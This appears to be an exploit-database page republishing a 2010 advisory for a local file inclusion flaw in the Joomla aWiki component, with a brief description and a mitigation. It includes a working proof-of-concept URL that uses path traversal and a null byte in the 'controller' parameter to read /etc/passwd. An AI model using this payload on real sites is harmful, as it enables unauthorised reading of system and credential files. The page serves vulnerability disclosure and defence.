Joomla Component aWiki Local File Inclusion

vendor:

aWiki

by:

Angela Zhang

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: aWiki

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component aWiki Local File Inclusion

A local file inclusion vulnerability exists in Joomla Component aWiki, which allows an attacker to include a file from the local system. This can be exploited to disclose sensitive information or execute arbitrary code by including malicious files from the local system.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

(o)===============================================================================(o)

                  Joomla Component aWiki Local File Inclusion


                Vendor   : http://joomla.anezi.net/awiki
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :   05 - April - 2010

(o)================================================================================(o)

     [o] Exploit
 
       http://localhost/[path]/index.php?option=com_awiki&controller=[LFI]
 
 
    [o] PoC
 
       http://localhost/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00



(o)==================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , s4va, 
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk
     
(o)===================================================================================(o)